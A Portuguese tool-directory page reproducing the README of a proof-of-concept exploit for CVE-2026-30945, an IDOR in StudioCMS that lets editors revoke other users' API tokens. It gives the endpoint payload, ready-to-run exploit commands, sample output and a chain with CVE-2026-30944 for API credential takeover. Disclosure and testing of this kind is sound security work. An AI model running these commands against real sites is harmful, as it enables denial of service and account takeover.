Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-30945-PoC — Prova de conceito de exploit para CVE-2026-30945, um IDOR no StudioCMS que permite revogação arbitrária de tokens de API e negação de serviço. Inclui modos de teste manual e automatizado. | Kitploit
Ferramentas/GitHubGitHub/filipegaudard/cve-2026-30945-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoSegurança de API
GitHubfilipegaudard/cve-2026-30945-poc

CVE-2026-30945-PoC

Prova de conceito de exploit para CVE-2026-30945, um IDOR no StudioCMS que permite revogação arbitrária de tokens de API e negação de serviço. Inclui modos de teste manual e automatizado.

Ver Repositório
23há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🗑️ CVE-2026-30945

StudioCMS IDOR — Revogação Arbitrária de Tokens de API Levando a Negação de Serviço

CVE CVSS CWE Type

NVD • Advisory • CWE-639


Visão Geral

O endpoint DELETE /studiocms_api/dashboard/api-tokens no StudioCMS ≤ 0.3.0 permite que qualquer usuário autenticado com privilégios de editor ou superiores revogue tokens de API pertencentes a qualquer outro usuário, incluindo contas admin e owner.

O handler aceita tokenID e userID diretamente do payload da requisição sem verificar a propriedade do token, a identidade do chamador ou a hierarquia de papéis. Isso possibilita negação de serviço direcionada contra integrações e automações críticas.

Relacionado: Esta vulnerabilidade compartilha a mesma causa raiz do CVE-2026-30944 (IDOR de geração de tokens). Quando encadeadas, um atacante pode revogar tokens legítimos e gerar novos, alcançando a tomada completa das credenciais de API.

Fluxo do Ataque

┌──────────────┐   DELETE /api-tokens        ┌──────────────┐
│              │  {"tokenID":"<id>",          │              │
│   Atacante   │   "userID":"<owner-id>"}     │  StudioCMS   │
│   (Editor)   │ ──────────────────────────► │   Servidor   │
│              │                              │              │
│              │ ◄────────────────────────── │              │
└──────────────┘  {"message":"Token deleted"} └──────────────┘
                                                     │
                                                     ▼
                                              ┌──────────────┐
                                              │  Pipeline    │
                                              │  CI/CD do    │
                                              │  Owner       │──► ❌ 401 Não Autorizado
                                              │  Integração  │──► ❌ Acesso à API Perdido
                                              │  Monitoramento│──► ❌ Falha Silenciosa
                                              └──────────────┘

Detalhes da Vulnerabilidade

CampoValor
CVECVE-2026-30945
GHSAGHSA-8rgj-vrfr-6hqr
CVSS v3.17.1 (Alta) — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H
CWECWE-639: Bypass de Autorização Através de Chave Controlada pelo Usuário
CWE (secundária)CWE-863: Autorização Incorreta
MITRE ATT&CKT1531 — Remoção de Acesso à Conta
OWASP APIAPI1:2023 — Autorização de Nível de Objeto Quebrada
Afetadostudiocms ≤ 0.3.0
Corrigido emstudiocms 0.4.0

Conteúdo

ArquivoDescrição
cve_2026_30945_poc.pyScript de exploração em Python com modos manual e automatizado
README.mdEste arquivo
LICENSELicença MIT

Pré-requisitos

  • StudioCMS ≤ 0.3.0 (versão vulnerável)
  • Python 3.8+
  • Credenciais válidas para pelo menos uma conta Editor
  • Um UUID de registro de token conhecido (ID interno, não o JWT)
pip install requests colorama

Início Rápido

Exploração Manual

# Revogar um token específico pertencente ao owner
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc

# Encadear com CVE-2026-30944: criar um token para o alvo primeiro
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1

# Salvar resultados em JSON
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc \
  --save

Teste Automatizado

# Testar com múltiplos papéis
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --editor-user editor01 \
  --editor-pass editorpass \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc

Argumentos

Obrigatórios

ArgumentoDescrição
-u, --urlURL base do StudioCMS alvo
--target-uuidUUID do usuário alvo cujo token será revogado

Opcionais

ArgumentoDescrição
--token-idUUID interno do registro do token a ser revogado (não o JWT). Se omitido, o script tentará criar um token primeiro via CVE-2026-30944

Modo Manual

ArgumentoDescrição
--usernameNome de usuário para autenticação
--passwordSenha para autenticação

Modo de Teste Automatizado

ArgumentoDescrição
--auto-testAtivar teste automatizado com múltiplos papéis
--editor-userNome de usuário da conta Editor
--editor-passSenha da conta Editor
--visitor-userNome de usuário da conta Visitante
--visitor-passSenha da conta Visitante

Flags

ArgumentoDescrição
--saveSalvar resultados em arquivo JSON
--no-ssl-verifyDesativar verificação de certificado SSL

Exemplo de Saída

Sistema Vulnerável

  ──────────────────────────────────────────────────────────
  FASE 1: Autenticação
  ──────────────────────────────────────────────────────────
  [+] Autenticado como 'editor01'
  [*] Usuário da sessão: editor01 (editor)
  [*] UUID da sessão: 39b3e7d3-5eb0-48e1-abdc-ce95a57b212c

  ──────────────────────────────────────────────────────────
  FASE 3: Revogação de Token (IDOR)
  ──────────────────────────────────────────────────────────
  [*] UUID alvo: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] ID do token:    16a2e549-513b-40ac-8ca3-858af6118afc
  [*] Revogando token de API do alvo...
  [+] Token revogado! Resposta do servidor: Token deleted
  [!] VULNERABILIDADE CONFIRMADA — Token revogado com sucesso!
  [!] As integrações de API do usuário alvo agora estão quebradas (DoS)

Sistema Corrigido

  ──────────────────────────────────────────────────────────
  FASE 3: Revogação de Token (IDOR)
  ──────────────────────────────────────────────────────────
  [*] UUID alvo: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] ID do token:    16a2e549-513b-40ac-8ca3-858af6118afc
  [*] Revogando token de API do alvo...
  [*] Acesso negado (403 Forbidden) — o endpoint pode estar corrigido
  [-] Falha na revogação: Acesso negado (403 Forbidden)

Cadeia de Ataque (CVE-2026-30944 + CVE-2026-30945)

Quando combinado com o IDOR de geração de tokens (CVE-2026-30944), um atacante pode realizar a tomada completa das credenciais de API:

Passo 1: Revogar o token legítimo do owner    (CVE-2026-30945)
   └──► Os pipelines CI/CD do owner quebram silenciosamente

Passo 2: Gerar novo token para o owner        (CVE-2026-30944)
   └──► O atacante agora tem acesso de API em nível de owner
Baixar ferramenta